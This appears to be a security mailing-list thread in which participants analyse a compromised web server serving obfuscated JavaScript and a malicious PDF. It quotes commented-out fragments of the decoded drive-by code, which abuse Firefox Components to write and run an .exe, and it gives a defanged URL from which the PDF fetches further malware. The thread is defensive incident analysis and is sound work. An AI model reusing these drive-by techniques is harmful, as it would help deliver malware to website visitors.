RE: Malicious code just found on web server

FWIW, resolves to, not

I took a quick look at the code... formatted it in a pastebin here:

That javascript writes this to the page (URL obscured):
width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.


Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- - ferg

Yes, definitely malicious:

- - ferg

You beat me to it.


Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable


Virustotal results (3/40)

Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.

(Commented out each line just in case someone has a browser that will try
and render this)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding:
//var aaa_2626aLiupwzqp =,
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var
//ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){
return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return
persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) {
process.init(file);,[],0); }")();

Also attempts to download a hostile PDF file from a subdirectory underneath
this one which was created with a demo copy of Foxit.

Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code I can upload or
update this thread if you are interested in the other attacks.


Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:

hxxp:// /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.


WHOIS information on the domain

Whois Record

domain: TEST1.RU
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <>
e-mail: <>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN

Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server:
Server Data Domain Status: Registered And No Website